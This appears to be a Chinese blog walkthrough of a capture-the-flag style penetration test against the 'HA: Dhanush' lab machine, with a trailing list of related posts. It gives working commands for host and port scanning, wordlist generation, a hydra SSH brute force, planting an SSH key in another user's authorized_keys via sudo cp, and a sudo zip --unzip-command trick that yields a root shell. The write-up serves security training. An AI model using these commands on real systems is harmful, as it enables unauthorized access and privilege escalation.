HA: Dhanush靶机渗透测试
文章目录
- 一、信息收集
- 1.主机发现
- 2.端口扫描
- 3.查看 web 服务
- 二、漏洞挖掘
- 1.使用 cewl 生成字典
- 2.使用 hydra 进行爆破
- 3.ssh 连接
- 4.尝试 sudo 提权
靶机介绍:
一、信息收集
1.主机发现
arp-scan -l
发现靶机 ip:192.168.1.119
2.端口扫描
nmap -A -p- 192.168.1.119
发现开放了 80 端口,Apache 服务,ubuntu系统;
65345 端口,ssh 服务
3.查看 web 服务
访问 192.168.1.119:
发现介绍 dhanush,没有什么特别的
二、漏洞挖掘
1.使用 cewl 生成字典
没有什么信息,根据提示:枚举,我们尝试从靶机的 web 服务生成 ssh 登陆的账号密码进行遍历爆破
cewl http://192.168.1.119/ -w dict.txt #生成密码
john --wordlist=dict.txt --stdout --rules > ./users.txt #生成用户名列表
2.使用 hydra 进行爆破
hydra -L ./users.txt -P ./dict.txt 192.168.1.119 ssh -s 65345 -e nsr -t 30
爆破时间较长,大概需要 10 分钟左右
3.ssh 连接
ssh pinak@192.168.1.119 -p 65345
yes
Gandiv
4.尝试 sudo 提权
发现可以以 sarang 用户权限使用 cp,查看该用户信息
发现 sarang 路径下有 .ssh 目录,尝试进入但是没有权限,结合 sudo -l 得到的可以 sarang 权限执行 cp ,尝试在当前用户创建 ssh,将公钥复制到 sarang 路径去然后使用 ssh 连接
cd ~
ssh-keygen #生成ssh密钥(我这里是一直回车无密码)
chmod 777 ./.ssh/id_rsa.pub
cp .ssh/id_rsa.pub /home/pinak
sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
ssh sarang@127.0.0.1 -i /.ssh/id_rsa -p 65345
经过一番操作可以看到我们进入了 sarang 用户
再次尝试 sudo 提权
发现可以以 root 权限执行 zip 命令,进行利用获得 root 权限
touch dhanush
sudo zip /tmp/dhanush.zip /home/sarang/dhanush -T --unzip-command="sh -c /bin/bash"
cd /root
HA: Dhanush靶机渗透测试相关推荐
- HA: InfinityStones靶机渗透测试
文章目录 靶机信息 一.信息收集 1.主机发现 2.端口扫描 3.目录扫描 二.漏洞挖掘 1.访问 192.168.1.108 2.访问 /img 目录 3.访问 https 服务(443)端口 4. ...
- HA: Forensics靶机渗透测试
文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...
- HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
- DC-2靶机渗透测试流程
目录 一.DC-2靶机搭建 二.收集信息. 三.访问80端口,发现超时. 1.修改hosts文件 2.访问http://dc-2成功. 四.目录扫描,拿到重要信息. 1.使用kali自带工具dirb ...
- 靶机渗透测试(covfefe)
靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate ...
- 靶机渗透测试(Tre: 1)
靶机渗透测试(Tre: 1): Vulnhub靶机 Tre: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate) ...
- CH4INRULZ靶机渗透测试
CH4INRULZ靶机渗透测试 环境 工具 流程 环境 kali攻击机 192.168.1.105 靶机 192.168.1.103 工具 hackbar,netdiscover,nmap,searc ...
- DC-3靶机渗透测试
DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这 ...
- 靶机渗透测试(unknowndevice64: 1)
靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访 ...
最新文章
- Interview:算法岗位面试—10.15下午—上海某公司算法岗位(偏机器学习,合资制造行业)技术面试考点之电话面试—研究项目的技术考察
- 已安装内存和可用内存不一致 4GB内存在win1064位系统中显示为可用 3.87GB解决办法
- 这个学期的总结,下个学期比较坑的事情和要注意的点
- 启明云端1.54寸串口屏使用经验分享
- WEB接口测试之Jmeter接口测试自动化 (二)(数据分离)
- laravel $request 多维数组取值_大白话 Laravel 中间件
- 安装itunes需要管理员身份_ITUNES无法安装,提示没有权限如何解决?
- 实战:Redis 集群模式(下)
- 查看mysql是否启用安全审计_如何查看oracle是否开启了审计功能?
- RabbitMQ学习之基于spring-rabbitmq的RPC远程调用
- 10-windows下的Orcale报错ORA-01031: 权限不足
- 差速移动机器人之位姿整定
- 4 个拥有绝佳命令行界面的终端程序
- Camshift算法
- 番外5. Python OpenCV 中滑动条详细说明与常见问题解决方案
- 移动终端开发详解总结(一)(kotlin版)| CSDN创作打卡
- element-ui的Progress进度条,当前状态样色和背景色的设置
- MySQL主从同步(一主一从、一主多从、主从从)等结构的概述与配置
- 一政网好吗,考公务员报班的作用
- 自己动手写CSDN博客提取器源码分析之三:处理网页保存为pdf文件